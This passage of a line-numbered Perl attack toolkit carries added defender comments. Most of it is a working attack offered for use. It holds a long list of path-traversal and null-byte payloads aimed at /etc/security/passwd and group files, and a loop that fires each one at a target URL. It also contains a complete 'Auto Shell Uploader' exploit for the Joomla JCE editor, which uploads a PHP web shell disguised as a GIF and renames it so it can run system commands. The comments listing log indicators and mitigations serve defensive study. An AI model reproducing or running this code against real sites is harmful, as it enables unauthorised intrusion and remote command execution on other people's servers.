etc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F..
..%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/group","../etc/security/group","../../etc/security/group","../../../etc/security/group","../../../../etc/security/group","../../../../../etc/securit
y/group","../../../../../../etc/security/group","../../../../../../../etc/security/group","../../../../../../../../etc/security/group","../../../../../../../../../etc/security/group","../../../../../../../../../../etc/security/group","/etc/security/group%00","../etc/security/group%00","../../etc/security/group%00","../../../etc/security/group%00","../../../../etc/security/group%00","../../../../../etc/security/group%00","../../../../../../etc/security/group%00","../../../../../../../etc/security/group%00","../../../../../../../../etc/security/group%00","../../../../../../../../../etc/security/group%00","../../../../../../../../../../etc/security/group%00","%2Fetc%2Fsecurity%2Fgroup","..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","%2Fetc%2Fsecurity%2Fgroup%00","..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","%2F%2Fetc/security/group","....%2F%2Fetc/security/group","....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/se
curity/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","%2F%2Fetc/security/group%00","....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","//etc/security/group","....//etc/security/group","....//....//etc/security/group","....//....//....//etc/security/group","....//....//....//....//etc/security/group","....//....//....//....//....//etc/security/group","....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//....//etc/security/group","//etc/security/group%00","
....//etc/security/group%00","....//....//etc/security/group%00","....//....//....//etc/security/group%00","....//....//....//....//etc/security/group%00","....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//....//etc/security/group%00");
  1397.  
  # LFI probe loop: prompts for a URL prefix, then issues one GET per entry of
  # @LFI (the traversal / null-byte payload list defined above) and records a
  # verdict for each request.
  # Defender view: a single client sending a long run of GETs whose parameter
  # value contains ../, ..%2F, ....// or %00 followed by etc/shadow, etc/group
  # or etc/security/* is what this loop looks like in web access logs.
  1398. print "\n\ Enter Target eg:http://www.site.com/index.php?option=com_jeauto&view=";
  1399. print "\n\ Target:";
  1400. $Target=<STDIN>;  # operator-supplied URL prefix read from the console
  1401. chomp ($kkk);
  1402.  
  1403.  
  1404. foreach $LFI(@LFI){
  1405. my $URL = $kkk.$LFI;  # candidate URL: $kkk with one payload appended
  1406. my $Source = get $URL;  # LWP::Simple get (imported in the file header)
  1407. die "Can not get $URL" unless defined $URL;
  # Keyword-based verdict (root, usr, dev, :x:, var, bin, case-insensitive);
  # a "FOUND" line is a heuristic guess and should be treated as unverified.
  1408. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
  1409. else { $Message = "NOT FOUND LFI Vulnerability";}
  1410. print "$URL     =>    $Message\n";
  1411. print "\n \n \n \n \t \t \t \t FINISH ";
  # Every verdict is appended to LFI.txt (relative path, so the current
  # working directory) - a host-side artifact to look for during triage.
  1412. open (TEXT, '>>LFI.txt');
  1413. print TEXT "\n$URL   =>   $Message \n\n";
  1414. close (TEXT);
  1415. print 'result in LFI.txt';
  1416. }
  1417. }
  1418.  
  # Menu option 5: automated upload attempt against the imgmanager plugin of
  # the Joomla JCE editor extension. Sequence visible below: (1) fetch the
  # plugin page and compare it with version strings the script labels as
  # patched, (2) POST a multipart upload named 0day.gif whose body is a GIF89a
  # marker followed by PHP, (3) POST a JSON folderRename from /0day.gif to
  # 0day.php, (4) look for "200 OK" and print the resulting path.
  #
  # Defender notes (every value is taken from this listing):
  #   - Log indicators: User-Agent "BOT/0.1 (BOT for JCE)"; requests to
  #     index.php with option=com_jce&task=plugin&plugin=imgmanager; a POST
  #     body containing "folderRename"; any hit on /images/stories/0day.php,
  #     especially with a cmd= query parameter.
  #   - File indicators: 0day.gif or 0day.php under images/stories.
  #   - Mitigation: run a JCE release that this script labels "patched" (the
  #     version strings in @arr) or newer, and deny PHP execution in upload
  #     directories such as images/stories.
  1419. if($c eq '5')
  1420. {
  1421. system("title Joomla JCE vuln");
  1422. system("cls");
  1423. print color("green"), "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
  1424. print color("green"), "\t||||        edited by: CrashBandicot (ccrashbandicot[@]gmail[dot]com)      ||||\n\n";
  1425. print color("green"), "Write your target (without http://) : ";
  1426. my $fuck = <>;
  1427. chomp $fuck;
  1428. $TARGET = $fuck;
  1429. $PORT   = "80";
  1430. $SCRIPT = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20";
  1431. $SHELL  = "/images/stories/0day.php?cmd=";
  1432. $HTTP   = "http://";
  1433.  
  # Hand-built request lines and headers; the fixed User-Agent, multipart
  # boundary and file names below are stable strings for log and WAF matching.
  1434. $header1G = "GET $SCRIPT HTTP/1.1";
  1435. $header1H = "HEAD /images/stories/0day.php HTTP/1.1";
  1436. $header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1";
  1437. $header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1";
  1438. $header2 = "Host: $TARGET";
  1439. $header3 = "User-Agent: BOT/0.1 (BOT for JCE)";
  1440. $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334";
  1441. $header5 = "Content-Length: 769";
  1442. $header6 = "-----------------------------41184676334";
  1443. $header7 = 'Content-Disposition: form-data; name="upload-dir"';
  1444. $header8 = '/';
  1445. $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""';
  1446. $header10 = 'Content-Type: application/octet-stream';
  1447. $header11 = 'Content-Disposition: form-data; name="upload-overwrite"';
  1448. $header12 = "0";
  1449. $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="0day.gif"';
  1450. $header14 = 'Content-Type: image/gif';
  # GIF magic bytes placed ahead of the PHP payload - presumably so the upload
  # is accepted as an image; content inspection should not stop at the header.
  1451. $header15 = 'GIF89aG';
  1452. $header16 = "<? system($_GET['cmd']);exit; ?>";
  1453. $header17 = 'Content-Disposition: form-data; name="upload-name"';
  1454. $header18 = '0day';
  1455. $header19 = 'Content-Disposition: form-data; name="action"';
  1456. $header20 = 'upload';
  1457. $header21 = "-----------------------------41184676334--";
  1458. $header22 = 'X-Request: JSON';
  1459. $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';
  1460. $header25 = 'json={"fn":"folderRename","args":["/0day.gif","0day.php"]}';
  1461. $header24 = "Content-Length: ".length($header25)."";
  1462.  
  1463. ############################################### Packet 1 --> Checking Exploitability #########################################################
  1464. print "\n[*] Checking Exploitability ...\n\n";
  1465. $pageURL=$TARGET.$SCRIPT;
  1466. $simplePage=get($pageURL);
  # Version strings the script labels as patched; they double as a list of
  # JCE releases to confirm during patch verification.
  1467. @arr = ("2.0.11</title","2.0.12</title","2.0.13</title","2.0.14</title","2.0.15</title","1.5.7.10</title","1.5.7.11</title","1.5.7.12</title","1.5.7.13</title","1.5.7.14</title");
  1468. while (($count!=10) && ($die != 1)) {
  1469.     foreach $arr(@arr){
  1470.         if ($simplePage =~ m/$arr/) {
  1471.             print "\n[*] Target patched.\n\n";
  1472.             $die = 1;
  1473.         } else {
  1474.             $count++;
  1475.                 }
  1476.         }
  1477.     }
  1478.  if ($count==5) {print "[*] Target is exploitable.\n\n"};
  1479. ############################################### Packet 2 --> Uploading shell as a gif file #########################################################
  1480. $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
  1481. || die "Can't connect to $TARGET";
  1482. print "[*] Trying to upload 0day.gif ...\n\n";
  1483. print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n";
  1484. ############################################### Packet 3 --> Change Extension from .gif to .php #########################################################
  1485. print "[*] Trying to change extension from .gif to .php ...\n\n";
  1486. $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
  1487. || die "Can't connect to $TARGET";
  1488. print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";
  1489. ############################################### Packet 4 --> Check for successfully uploaded #########################################################
  1490. $shellurl=$TARGET.$SHELL;
  1491. $output=get($shellurl);
  1492. while ($output = <$remote> ) {
  1493. if ($output =~ /200 OK/) {
  1494. print "[+] 0day.php was successfully uploaded\n\n";
  1495. print "[+] Path:".$TARGET.$SHELL."id\n";
  1496. }}
  1497.  
  1498. }
  1499. }
